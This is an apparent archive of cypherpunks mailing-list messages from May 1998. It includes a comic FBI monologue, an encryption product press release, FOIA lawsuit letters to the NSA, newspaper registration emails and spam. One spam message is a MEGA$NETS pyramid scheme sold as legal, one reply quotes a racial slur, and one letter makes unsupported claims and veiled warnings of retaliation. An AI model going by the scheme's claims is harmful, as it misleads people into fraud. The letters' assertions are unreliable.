You know, that's part of their job.  Follow me around.  I'm out on the
highway, and I'm drivin' down the road, and I run out of gasoline and I pull
over to the side of the road, they got to pull over too, make believe they ran
out.  You know, I go to get some gasoline, they have to figure out whether
they should stick with the car, or follow me!  Suppose I don't come back and
they're staying with the car.  Or if I fly on the airplanes.  I can fly half-
fare because I'm 12 - 22, and they got to pay the full fare.  But, well, what
the thing is when you pay the full fair, you have to get on the airplane first
so that they know how many seats are left over for the half-fair kids.
Allright and sometimes there aren't any seats left over and, sometimes there
are but that doesn't mean you have to go!  Well suppose he gets on and fills
up the last seat.  So you can't get on, then  he gets off, then you can get
on!  What's he going to do?  Wait, well, it's a drag for him.

But that's not, that's not why I want to dedicate the song to the FBI.
During, during these hard, days, and hard weeks, everybody always has it bad
once in a while, you know you, you have a bad time of it, and you always has a
friend that says "hey man, you ain't got it that bad, look at that guy."  And
you look at that guy, and he's got it worse than you!  And it makes you feel
better that there's somebody that's got it worse than you.  But think of the
last guy.  For one minute, think of the last guy.  Nobody's got it worse than
that guy.  Nobody, in the whole world, that guy, he's so alone in the world,
that, he doesn't even have a street to lay in for a truck to run him over.
He's out theeerre, with nothing.  Nothin's happening for that cat.  And all
that he has to do to, create a little excitement in his, own life, is to bum a
dime from somewhere, call up the FBI, say "FBI?" they say "yes?" say "I dig
Uncle Ho and Chairman Mao and their friends are coming over for dinner.",
hang up the phone.  

And within two minutes, and not two minutes from, when he hangs up the phone
but two minutes from when he first put the dime in, they got 30,000 feet of
tape rollin'.  Files on tape, pictures, movies, dramas, actions on tape.  But
then they send out a half a million people all over the entire world, the
globe, they find out all they can about this guy.  'Cause there's a number of
questions involved in this guy.  I mean if he was the last guy in the world,
how did he get a dime to call the FBI?  There are plenty of people that aren't
the last guy, that can't get dimes, he comes along and he gets a dime!  I mean
if, if he had to bum a dime to call the FBI, how was he going to serve dinner
for all those people?  *How could the last guy make dinner for all those
people?*  And if he could make dinner, and was gonna make dinner, then why did
he call the FBI?  And they find out all of those questions within two minutes!

And that's the, that's the great thing about America!  I mean, this is the
only country in the world, I mean well it's it's not the only country in the
world that could find stuff out in two minutes, but it's the only country in
the world that would take two minutes for that guy!  Well other countries
would say "Hey, he's the last guy, screw him!", you know?  But, but in America
there is no discrimination.  And there is no hypocracy, 'cause they'll get
anybody.  And that's, that's a wonderful thing, about America.

And that's why tonight, I'd like to dedicate it to every, FBI man in the
audience.  I know, you can't say nothin' you know.  You can't get up and say,
"Hi!", you know, 'cause then everybody knows, that you're a FBI man, that's a
drag for you, and your friends!  They're not really your friends, are they.  I
mean so you can't get up and say nothing 'cause otherwise, you got to get sent
back, to the factory.  And that's, that's a drag for you and an expense for
the government.  And that's a drag for you.  

We're going to sing you this Christmas Carol.  It's for all you bastards out
there in the audience tonight.  It's called 'The Pause of Mr. Claus'.  

<waltz> Why do you sit there so strange
Is it because you are beautiful
You must think you are deranged
Why do police guys beat on peace guys?

You must think Santa Claus wierd
He-e has lo-ong hair and a beard
Giving his presents for free
Why do police guys mess with peace guys?

Let's get Santa Clause 'Cause

Santa Claus has a red suit, he's a communist
And a beard and long hair, must be a pacifist
What's in the pipe that he's smoking???????

Mr. Claus sneaks in your house at night
he must be a dope-fiend, to put you uptight
Why do police guys, beat on peace guys?
@@@@@
What can I say?  We have alot of fun.

Stan,
FreeGroup - "Just Say It!"
http://members.aol.com/whtsametau/FreeGroup.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iu87y@hotmail.com (kj87u)
Date: Fri, 29 May 1998 07:12:45 -0700 (PDT)
To: iu87y@hotmail.com
Subject: VENTURE CAPITAL OPPORTUNITY
Message-ID: <199805293650TAA36479@76tg54@hotmail.com.nationwide.net>
MIME-Version: 1.0
Content-Type: text/plain


VENTURE CAPITAL BUSINESS AND CAREER OPPORTUNITY

Our corporation, through our expanding partners network,
and in conjunction with varied and substantial investment
groups, provides venture capital, equity and debt funding
to corporate clients nationwide.

We are currently expanding our system and are seeking a
professional individual as our associate, who in turn,
will qualify clients for our services.

There is an $8,250 investment.

To receive an extensive package of printed information,
please call our voice mail system at 214-373-2032 and leave
your complete name and mailing address.

This is a ONE time mailing only.  It will NOT be repeated.
You are NOT on any mailing list, and your name is DELETED after
you receive this message.  If this message is not of interest
to you, we are sorry for the intrusion. You DO NOT have to email
us to remove your name.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Fri, 29 May 1998 13:01:38 -0700 (PDT)
To: undisclosed-recipients:;
Subject: Extensis Plug-ins are Compatible with Adobe Photoshop 5.0
Message-ID: <bulk.7864.19980529103658@smeg.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


As an Extensis customer you will be happy to know that 
all Extensis products are now Photoshop 5.0 compatible. 
You can download the latest versions off of our web site 
for free. These updates are available for all Extensis 
Photoshop plug-ins including: Intellihance 3.0.2, Mask Pro 1.0, 
PhotoFrame 1.0, and PhotoTools 2.0.2.

Simply visit the Extensis site at http://products.extensis.com/updates/
to get your FREE download.

For additional information on Extensis please visit 
http://www.extensis.com/

For Extensis Customer Service please call 1-800-796-9798.
_________________________________________________________________

PS. We have made every effort to ensure this message is being sent 
only to people who have expressed interest in Extensis products.  
If we have sent this to you in error, please accept our apologies 
and reply with REMOVE in the subject line and your email address 
in the body for automatic exclusion from future communications.  
If you know someone who would like to be on our mailing list 
have them send an email to listmaster@extensis.com with ADD in 
the subject line and their email address in the body.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mia Westerholm <Mia.Westerholm@DataFellows.com>
Date: Fri, 29 May 1998 06:03:16 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: Data Fellows Announces F-Secure FileCrypto
Message-ID: <3.0.2.32.19980529144257.00a239e0@smtp.DataFellows.com>
MIME-Version: 1.0
Content-Type: text/plain


For immediate release
29 May 1998

DATA FELLOWS ANNOUNCES F-SECURE FILECRYPTO 

New Product Provides Centrally Managed On-the-Fly Protection For Sensitive
Data on Personal Computers

Helsinki, Finland, May 29, 1998  -- Data Fellows, a leading developer of
data security software, today announced F-Secure FileCrypto, the latest
addition to the company's award-winning cryptographic product line.
F-Secure FileCrypto will provide strong, on-the-fly encryption for
confidential data in the Microsoft Windows 95/98 and NT 4.0 environments.

"F-Secure FileCrypto is the only file encryption product on the market
designed for companies with thousands of PCs," says Mr. Camillo Sars,
Product Manager, Data Fellows. "The protection of confidential files has
never been this easy. F-Secure FileCrypto is centrally installed over the
entire network, and automatically encrypts all open and temporary files.
The process is completely transparent to end-users, requiring no action
from them at all." 

F-Secure FileCrypto is managed from a central location. The administrator
can define a security policy for all installed copies of the software. The
recommended basic policy is encrypting all directories on the local hard
drive.

The program also features a key retrieval function. If a user forgets the
password that allows access to encrypted files, the Administrative Key
Recovery function manages the situation safely and easily.

According to Mr. Sars: "F-Secure FileCrypto is the first and only product
to integrate strong real-time encryption into the Windows file system. It
automatically encrypts data before it gets stored on the hard disk,
protecting sensitive information even in the most demanding situations. If
a PC is improperly turned off, or if a laptop computer's batteries go dead,
any open or temporary files will be encrypted and safe."

F-Secure FileCrypto also has a feature which allows users to send encrypted
e-mail to other users. Encrypted e-mail can be decrypted with a password.

F-Secure FileCrypto uses well-known fast block cipher algorithms. Either
the three-key 3DES, or the Blowfish algorithm, can be selected. Both
algorithms have been analyzed by the world's leading cryptographers and are
known to be strong and safe.

"Files protected by F-Secure FileCrypto are not accessible to computer
freaks, hackers, or even cryptography experts. Each file is encrypted with
a random session key. Breaking a single key would give someone access to
only one file, and the job would consume trillions of years of computer
time," says Mr. Sars.

F-Secure FileCrypto for Windows NT 4.0 will be available in July 1998, from
Data Fellows' resellers around the world. F-Secure FileCrypto for Windows
95 and 98 will be available later this year.

About Data Fellows

Data Fellows is one of the world's leading developers of data security
software. The company's groundbreaking F-Secure products provide a unique
combination of globally available strong encryption and revolutionary
anti-virus software. The integrated F-Secure software family provides
complete security solutions for enterprises of any size. It includes file
encryption and IPsec communication encryption products, VPN gateways,
SSH-based secure remote management software, easy-to-use solutions for
distributed DNS management, and a full range of anti-virus products for
workstations, servers and gateways. Data Fellows is also the developer of
the award-winning 
F-PROT Professional anti-virus engine, which is now an integral part of the
multiple engine structure of F-Secure Anti-Virus.   

Data Fellows has offices in San Jose, California, and Helsinki, Finland. In
addition, it offers a worldwide network of technical support, training and
distribution in over 80 countries. 

Since the company was founded in 1988, its annual net sales growth has
consistently been over 80%. Data Fellows belongs to an elite group of
companies with a triple-A rating from Dun&Bradstreet. The company is
privately owned.  

For further information, please contact

Data Fellows Ltd., Finland:
Mr. Camillo Sars, Product Manager	
Tel.  +358 9 859 900
Fax. +358 9 8599 0599
E-Mail: Camillo.Sars@DataFellows.com

Data Fellows Inc., USA:
Mr. Petri Laakkonen, President
Tel. +1 408 938 6700
Fax  +1 408 938 6701
E-mail:  Petri.Laakkonen@DataFellows.com

Visit our web site at http://www.DataFellows.com

Mia.Westerholm@DataFellows.com 
http://www.DataFellows.com

Data Fellows Ltd.
PL 24
FIN-02231 ESPOO, FINLAND
Tel. +358 9 859 900
Fax. +358 9 8599 0599




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 29 May 1998 18:10:42 -0700 (PDT)
To: john gilmore <gnu@toad.com>
Subject: FOIA fee waiver denial lawsuit
Message-ID: <356F5BAC.6D4D@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 5/29/986:52 PM

                 UNITED STATES DISTRICT COURT
                 FOR THE DISTRICT OF COLUMBIA

John Gilmore		                    )
Arthur R. Morales                           )
William H. Payne        	   	   
)                                            			    )
                Plaintiffs,                 )
					    )	
Lieutenant General Kenneth A. Minihan, USAF )   
Director, National Security Agency	    )
National Security Agency		    )
9800 Savage Road			    )
Fort George G. Meade, MD 20755-6000	    )	    
                                            )
                Defendant                   )
____________________________________________)


                    DEMAND FOR JURY TRIAL

Gilmore  http://www.cygnus.com/~gnu/

Hope you got my three phone messages.

My belief is that NO ONE has ever sued over a FOIA
fee waiver denial.

BECAUSE of the VISIBILITY that John Young has given NSA
lawsuits http://www.jya.com/nsa-cases.htm I think that
it is a propitious time to sue NSA in the District of 
Columbia over a FOIA fee waiver denial.

Pro se for economic and LEGAL reasons.

And, of course, we should try to get some crypto patents
at the same time.  I have some ideas for keying crypto
devices  http://av.yahoo.com/bin/query?p=gfsr&hc=0&hs=0

Let me know your thoughts.  By secure communications, of 
course

bill


Friday 5/15/98 3:48 PM

By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF
Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  appeal a FOIA fee waiver denial.
2  continue to explore settlement possibilities of our current 
lawsuit.

30 March Joann H. Grube, Deputy Director of Policy, NSA, wrote
in response to my Friday February 27, 1998 attached letter to you

  There are 706 cases ahead of your in our processing queue. ..

  Please be advised that your request for a waiver of fees has been
  denied.

Public knowledge of how much taxpayer NSA has likely squandered 
ATTEMPTING to build public key crypto chips certainly in
the public interest.

Therefore, I appeal Grube's denial.

Grube wrote

  Any person notified on an adverse determination may, within 60
  days after notification of the determination, file an appeal to the
  NSA/CSS Freedom of Information Act Appeal Authority.  The
  appeal shall be in writing and addressed to the NSA/CSS FOIA 
  Appeal Authority, ...

General Minihan,  Grube apparently is attempting to invent her
own FOIA appeal rules instead of follow federal law.  

  Whenever a FOIA request is denied, the agency must inform
  the requester of the reasons for the denial and the requester's
  right to appeal the denial to the head of the agency.

I ask that you educate and possibly reprimand Grube for her failure
to properly state law.

As you may be aware

      (6)(A) Each agency, upon any request for records made under  
       paragraph (1), (2), or (3) of this subsection, shall--
        (i) determine within ten days \1\ (excepting
        Saturdays, Sundays, and legal public holidays) after
        the receipt of any such request whether to comply with
        such request and shall immediately notify the person
        making such request of such determination and the
        reasons therefor, and of the right of such person to
        appeal to the head of the agency any adverse
        determination; and

And you may also be aware

  -------------------------------------------------------------------------
      \1\ Under section 12(b) of the Electronic Freedom of Information
  Act Amendments of 1996 (Pub. L. 104-231; 110 Stat. 3054), the amendment
  made by section 8(b) of such Act striking ``ten days'' and inserting
  ``20 days'' shall take effect on October 3, 1997.
  -------------------------------------------------------------------------
            (ii) make a determination with respect to any
        appeal within twenty days (excepting Saturdays,
        Sundays, and legal public holidays) after the receipt
        of such appeal. If on appeal the denial of the request
        for records is in whole or in part upheld, the agency
        shall notify the person making such request of the
        provisions for judicial review of that determination
        under paragraph (4) of this subsection

So I expect a response to this appeal within the time allotted to you 
by law.

Our lawsuit has attracted international attention on Internet.

http://www.jya.com/whp050898.htm
http://www.jya.com/whp-10usca.htm
http://www.jya.com/whp043098.htm
http://www.jya.com/mf050998.htm
http://jya.com/whpfiles.htm
http://www.jya.com/crack-a5.htm
http://caq.com/cryptogate
http://www.aci.net/kalliste/speccoll.htm
http://www.aci.net/kalliste/nukearse.htm

Partially, perhaps, as the result of the about .5 million dead Iranian Shiite Muslims.
Or maybe judicial misconduct?

Morales and I plan to appeal to the Tenth in event that Morales' dismissal is upheld.

Further, we feel that YOU must be held accountable.  Therefore we will appeal your
removal from our lawsuit.

But this is sure to cost the taxpayer much more money.  

And failure to fairly settle these unfortunate matters raises the possibility of a understandable, or opportunistic, retaliatory attack for NSA's bungled spy sting on Iran
by the aggrieved or their enemies.  

Innocent people may be harmed.

Both alternatives are unpleasant to think about.

Therefore, Morales and I continue to offer to engage in settlement talks with YOU.

I cannot find your e-mail address

Therefore I will forward the e-mail copy of this FOIA appeal /settlement letter to 
Ray Kammer of NIST [http://www.nist.gov so that Kammer can possibly
forward an e-mail to you.

I am not reading e-mail. 

Sincerely,



William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037 




3






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Fri, 29 May 1998 21:28:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: When write high-speed implementation,
Message-ID: <19980530042752.25126.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


When write high-speed implementation,
Is S-box written by hexadecimal or
written by decimal?
Thanks.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Fri, 29 May 1998 22:35:11 -0700 (PDT)
To: cons0005@algonquinc.on.ca
Subject: Re: D.A.R.E. and a Bullpupy
In-Reply-To: <199805290226.WAA15318@algnet.algonquinc.on.ca>
Message-ID: <199805300534.AAA05884@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> If your a nigger,

	I have this buddy who did some time on a narcotics charge. He 
occasionally talks about some of the white folks he met while inside. Seems
many of them were associated with white power groups, and tried on several
occasions to recruit him.

	He said that the funniest thing about them was their consistent 
inability to spell properly, or to use anything vaguely resembling 
appropriate grammer or puncuation when writing. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: verify@nytimes.com (New York Times subscription robot)
Date: Fri, 29 May 1998 22:20:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Welcome to The New York Times on the Web
Message-ID: <199805300520.BAA28225@content9a.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome, coderpunk,

Thank you for registering for The New York Times on the Web.  

****************************
ABOUT YOUR REGISTRATION 
****************************
Your subscriber ID is coderpunk 
You selected your password at registration.
Your e-mail address is cypherpunks@toad.com    

We encourage you to print this message and save it for 
future reference.  If you have any questions about your 
registration we can find your account using the ID
and e-mail address listed above.

Unless you chose otherwise, your ID and password
have been saved on your computer so that you do not have to
enter them each time you visit our site.  Please keep in mind
that you can enter this ID and password on any computer 
to reach our Web site, so if you change computers or
install a new browser, there is no need to re-register.  If you
forget your password, please do not re-register.  You can retrieve
your password in the Help Center by clicking "Help" anywhere 
on the site.

For more information about the site and your registration, please
visit the Help Center at:

http://www.nytimes.com/subscribe/help/

*****************************************
ABOUT THE NEW YORK TIMES ON THE WEB
*****************************************

The New York Times on the Web combines the quality 
news coverage, authority and integrity of The New York Times 
with the immediacy, utility and depth of the Internet.  Our site 
includes daily contents from The Times, news updates 
every ten minutes from the Associated Press and throughout 
the day from New York Times editors, a low-cost 365-day 
archive of New York Times articles, and original reporting 
exclusive to the Web in CyberTimes.

The Times on the Web also features: 
** Up-to-the-minute sports scores and statistics 
** Current weather conditions and 5-day forecasts for over 
1,500 cities worldwide
** A searchable library of more than 50,000 book reviews
** Custom stock portfolios 
** Searchable Real Estate and Help Wanted listings 
** Subscription service to the Crossword Puzzle, Bridge 
and Chess columns    

Thank you for registering.  

Visit us again soon at:  http://www.nytimes.com

*****************************************

Please do not reply to this message.  If you did not 
authorize this registration, someone has mistakenly
registered using your e-mail address.  We regret 
the inconvenience; please FORWARD this message
to cancel@nytimes.com and we will remove it from
our records.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: forgot@nytimes.com
Date: Sat, 30 May 1998 02:10:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NYT Account Request
Message-ID: <199805301001.FAA22489340@inbox.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain



You have requested your ID and password for The New York Times on the Web.
Please follow the instructions below.

1.  Please make a note of your subscriber ID:

nifft

2.  Next, to get the password for this account, using your Web browser go
to this unique URL:

http://verify.nytimes.com/forgot/snp.cgi?ul=nifft~598571

This page will allow you to choose a new password.  Make sure you have
copied the address EXACTLY as it appears here.  (If you're getting an
"Error" page, the address was probably entered incorrectly.  See "Help With
Copying and Pasting" at the bottom of this e-mail.)

3.  Follow the instructions on the screen to choose a new password.  After
you have entered a password you will automatically enter our Web site.


The New York Times on the Web
Customer Service
forgot@nytimes.com

********************

Help With Copying and Pasting

1.  Using the mouse, highlight the entire Web address, (e.g.
http://verify.nytimes.com/forgot/snp.cgi?ul=nifft~598571) 
shown above in step 2.  It's essential
to highlight the entire address, even if it extends over two lines.
2.  Under the Edit menu at the top of your screen, select "Copy".
3.  Go into your Web browser (open it if it's not already opened).
4.  Click in the "Netsite" or "Address" bar -- the place in your Web
browser where it says what Web address you're currently looking at -- and
delete the address that's currently there.
5.  In the blank "Netsite" or "Address" bar, paste the address by selecting
the "Edit" menu at the top of your screen and choosing "Paste".
6.  Press Enter.
7.  Follow the instructions to choose a new password.

********************

If you did not request your ID and password for your NYT Web registration,
someone has mistakenly entered your e-mail address when requesting their
password. Please simply ignore this message, or, if you wish, you may go to
the address above to select a new password for your account.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ann <susangray32@aol.com>
Date: Sat, 30 May 1998 14:14:36 -0700 (PDT)
To: @
Subject: Where's my graduation present?
Message-ID: <m0yft3x-000edLC@mou.cz>
MIME-Version: 1.0
Content-Type: text/plain



                                   MEGA$NETS=MEGABUCK$
                                   ANYBODY CAN DO THIS.
                                   NO APPLICATION
                                   NO INVENTORY 
                                   NO MEETING
                                   NO PRODUCTION REQUIREMENT

NO BRAINER, EVEN A MONKEY COULD DO THIS!!!

JUST $$CASH$$
LOTS & LOTS & LOTS OF CASH !!$$!!$$!!

This is one of the most simple and yet brilliant plans ever created. Everybody
wins! BUT you must follow it exactly!! If you do the soon you will be laughing
all the way to the bank.

You are holding information in your hands on a home-based business concept
of the next century! This is a networking breakthrough of enormous potentials!
And it is here now and ready to help you earn the kind of income you deserve!
Welcome to the majors.

MEGA$NETS combines 3 of the most powerful income opportunities of our
time....computers, mail order, and network marketing. Together, they offer you a 
home-based business you can work full or part-time. MEGA$NETS is an easy to
use yet sophisticated software program to help the average person get in on the
fabulous profits being made in the computer networking age.


Most of us know the future is in computers. An estimated 150,000 new people
are getting on the internet each month! MEGA-PROFITS will be earned 
with computers whether you and I are involved or not. So why not get involved
Now?

The IBM compatible MEGA$NETS software disk cost just $20, yet it is designed to
bring you a tremendous income within a remarkable short period of time.

HERE'S HOW IT WORKS

Purchase the MEGA$NETS software disk for just $20 from the person sharing
this opportunity with you. Load it into your PC. You will be impressed with the
professional appearance of the software and how easy it is to operate! The
Menu includes access to a complete set of instructions. you also receive
seperate written and step by step instructions,so you do not even need to be
familiar with computers!

STEP 1. The computer will ask you to type in your own name & address. Be 
sure this information is correct. Once you click to the next screen, your
information will be permanently locked into the program. No one can remove 
it!!!

STEP2. Next you will see the names and addresses of 5 on your screen. Now
move to the next screen and click on " Purchase Orders". Your printer will
automatically produce a seperate Purchase Order for each of those 5 vendors.
Simply mail the orders, enclose a Self Addressed Stamped Envelope and
money order OR cash for $20 with each. In return for your orders and payment,
the 5 vendors will each send you a different code number. Your total
expenditure is $120: $20 for your original program disk and 5x20 for your codes.

STEP 3. Enter these into the computer program where it tells you to do so, and
now you are able to make copies of your disk. YOU CANNOT MAKE COPIES OF
DISKS WITHOUT THES 5 CODES. The program will not let you.

STEP 4. Once you enter the 5 codes you can now duplicate the disk and sell
each duplicated disk to other people who own or have access to a compatible
PC. They will want to buy because of the profit potential they too will have!
Selling is not difficult, Most people see the opportunity just by reading this
letter.

WHAT DO BUYERS DO?

When your customer loads your duplicated disk, they will be instructed to do the
same as you. They will purchase the computer codes they need to "unlock"
their program ( just like you did ) and begin to duplicate the disk, as many times
as they wish. Before they duplicate, your name and address will have
automatically been added into the system as an additional code vendor and
one name will have been deleted. This is no different than removing a name
from your rolodex. One name is added, one is removed.

MONEY MAKER LIKE YOU HAVE NEVER SEEN!!!

This is what could happen.

If you sell a minimum of 6 disks for $20 each, you will have back your original
$120 ( Except for the cost of some blank disks). If those 6 people sell just 6 each
all of those 36 disks will list your name and address as a code vendor. 36 people
will now send you $20 each along with a Purchase Orders generated by their disk
( total potential here is another $720 ). All you do is enter the Purchase Order
information into your program and your computer will automatically print out the
codes they have purchased from you. This takes about 30 seconds. Mail the codes
to your customers right away! Remember, the sooner they get their codes, the sooner
your name will be duplicated again and again!

Now when those 36 people sell to 6 people each, your name will automatically
move to the next position on ther screen. As one of the five code vendors, 216 (36
x 6) will each be sending you $20 for your codes ( which they must have to let
them make copies they can sell ). That's $4320 to add to your first $720...which
add up to $5040 so far. And that's only the start of it! if the 216 people sell
to only 6 others each, and your name moves to the 3rd position on everybodys
screen, potentially 1,296 people will be sending you $20...which is $25,920 PLUS
the $5,040 you received earlier. The potential earning so far could total $30,960 !


THE MULTIPLIER EFFECT  ( Here is where it becomes AWESOME !)

Your next payment in the 4th position could be $20 times 7776, which is
$155,520 .. Add that to your previous $30,960, and the grand total is $186,480...
when the 5th and final position is reached, your name disappears from future duplicated
disks. By then your TOTAL INCOME COULD BE $1,119,600!! AND REMEMBER THAT'S IF EVERYONE
IN YOUR GROUP ONLY SOLD 6 DISKS.


CAN YOU SELL MORE THAN SIX DISKS?

YES! MEGA$NETS allows you to make as manys disks as you wish. The 5 codes
you buy have licensed you to duplicate as many disks as you want. The software
will even calculate the results with whatever number you choose.

NO ONE CAN CHEAT YOU!!

That's right , it's impossible to cheat MEGA$NETS software! No names and 
addresses can be erased to put in the names of "friends", and the software is
programmed to generate constantly changing codes, nothing works! You are a true computer
software vendor and provider of valuable computer information codes that only you can
provide for your customers.


The MEGA$NETS Business System disk was developed by a professional commercial computer
programmer. It looks professional and works professionally. ( Some of today's best
whiz-kids have tried to break the system and failed.) In addition, MEGA$NETS checks itself
for viruses. If it finds any modifications, it would simply refuse to run, so your system
is fully protected without damaging your files. The distribution process is a similar
safeguard. By holding a duplicate of the software within itself, MEGA$NETS makes
absolutely sure that each copy is the same as the original, but with your personalized
information.


Let's take a mintue and truly understand what this business is all about. First of all,
it is NOT an investment. You are purchasing a product: a computer software program
with a 100% MONEY BACK GUARANTEE. Next, you can buy codes that will unlock the program
so you can make duplicated disks and sell them. Soon, customers will be requesting codes
from you. You become a vendor. You have something your customers need. That's real sales!
That's real business! Isn't that what American businesses do every day of the week? 
Don't they get paid for selling someone a product, a service or just some information?


IS THIS LEGAL?

As we have seen, MEGA$NETS is like any other legal information-driven company. 
First, you sell the software program which includes valuable marketing information
your customers can use for any business. Secondly,as an information vendor, you will be
selling valuable computer codes to your customers.Thirdly, you will be developing a 
mailing list out of your customers that can help you in promoting other customers that
can help you in promoting other income opportunities you may want to offer. Huge
multi-billion dollar worldwide companies do this every hour of the day. MEGA$NETS is no
different,we just use network marketing to get the job done.Plus, there are NO MEETINGS
TO ATTEND and no corporate headquaters or hot-shot executives who can change the plan
or grab  your earnings.


In effect, you are the owner and CEO of your own computer software network marketing
company! All you have to do now is purchase your disk and you are on your way to earnings
potential that will bring you financial independence! Just be ready to handle the volume!
You are now in the computer software mail order business. Treat this like a real business
and it can earn you the income of a real business! MEGA$INCOME.



DONT WAIT. DO IT NOW!!! 

LOADS OF CASH AWAITS YOU!!!

Call to hear live testimonials on MEGA$NETS ( It's FREE !!)
(888) 220-5808

To Order Your MEGA$NETS Disk

Send $20 Cash OR Money Order Payable To :
( INCLUDE Self Addressed Stamped Envelope )


GES
P.O. BOX 601162
SAN DIEGO, CA 92160


ACT NOW !!!

MEGA$NETS Comes with a 100% Money Back Guarantee!!   



	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adidas9062@aol.com
Date: Sat, 30 May 1998 11:56:19 -0700 (PDT)
Subject: HYPER PORN!!!
Message-ID: <a0cb3a0a.3570549b@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: Adidas9062@aol.com
Subject: Fwd: HYPER PORN!!!
From: Adidas9062@aol.com
Date: Sat, 30 May 1998 13:28:43 EDT



To: Adidas9062@aol.com
Subject: HYPER PORN!!!
From: Adidas9062@aol.com
Date: Fri, 29 May 1998 22:12:59 EDT

<b><big>The World's Best Free Porn<b><big>
<h1>CLICK HERE<h1>
<b><big>FREE Trail Membership!</big><b>




<small>services:</small>
     <small><small>teens, sluts, pics, avi's, streaming video, gifs, jpgs,
gay, lesbian, chicks, animals, studs, toys, and chat. Totally legal, service
is free for up to 1 week, no obligation. Absolutly no underage pornography!
This service also contains possible adult gaming links.</small></small>










please hit reply and enter "-remove " & your email address to be removed





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 30 May 1998 18:03:02 -0700 (PDT)
To: masanori fushimi <kalliste@aci.net>
Subject: Kirtland Air Force Base
Message-ID: <35709AFC.7DD3@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Saturday 5/30/98 5:15 PM

J Orlin Grabbe
Masanori Fushimi

Orline just saw  Spies Turn to High Tech Info Ops both at

at http://www.aci.net/kalliste/ and http://www.jya.com/crypto.htm

Friday at noon, after Lunch with Morales, I ventured onto Kirtland AFB
through the Wyoming gate.

In order to get into the National Atomic Museum I had to produce

	1  Drivers license
	2  proper car registration
	3  proof of insurance.

The airman who was to check 1,2,and 3 was busy on the phone.

The airman was reading serial numbers on a bullet-proof vest.

I asked the airman who THEY were afraid of.

The airman responded,

	1  gangs
	2  militias

The airman quipped that while he was unlucky enough to lose on 
a lottery ticket, he might be unfortunate enough to take bullet.

Therefore, the airman said he was wearing a bullet-proof vest, even in
about 90F weather.

I went to the museum and bought two FIRST ATOMIC BOMBARDMENT, 
50th ANNIVERSARY refrigerator magnets, like the one I sent to John
Young.

I mailed the one to Orlin, but I have the one for Masanori pasted on the
side on one of my computers.

Masanori, the book Decision to Use the Atomic Bomb by Gar Alperovitz
presents fairly good evidence some in US government nuked Hiroshima and
Nagasaki merely to impress the Russians.

Unfortunately, as we can see by the current government crypto debacle,
overall intellect of the US government has not improved much since 1945.
And maybe has decreased.

Masanori, one positive side of the unfortunate matter is that LOTS MORE 
people are reading your scientific papers.

http://av.yahoo.com/bin/query?p=gfsr&hc=0&hs=0

Let's all, of course, hope for settlement of these regrettable matters.

Later and, of course, Allahu akbar
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 30 May 1998 18:04:35 -0700 (PDT)
To: bill payne <billp@nmol.com>
Subject: Re: FOIA fee waiver denial lawsuit
In-Reply-To: <356F5BAC.6D4D@nmol.com>
Message-ID: <199805310104.SAA02100@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi folks -- sorry to add to your mail load.

Disbelieve any assertions or ideas that Bill Payne offers, about a joint
lawsuit including me and him as plaintiffs.  I could never aspire to
match his level of effectiveness at pursuing complaints against the
government.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 30 May 1998 17:11:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: BXA's KR Agents, NSA's Cult
Message-ID: <199805310011.UAA11401@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


BXA published yesterday its guidelines for getting approval
as a Key Recovery Agent:

   http://jya.com/bxa-kraguide.htm

The House Select Committee on Intelligence "has concluded 
that very large changes in the National Security Agency's culture 
and method of operations need to take place ... and that NSA 
will not meet its Unified Cryptologic Architecture (UCA) goals 
without tackling head-on some very fundamental internal 
obstacles."

Even so, as others earlier noted here, the Committee has
ruled out lifting encryption export controls.

   http://jya.com/ciise.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Mon, 1 Jun 1998 01:38:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: que pasa
Message-ID: <19980531.003128.9966.0.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,
	
	I would like to thank Xcott for sending me that faq.  Alos,
thanks to the other guy who sent the info on e-mailing your way around
the web...It is VERY confusing...

	I just have a few quick questions.  I have gotten well over 25
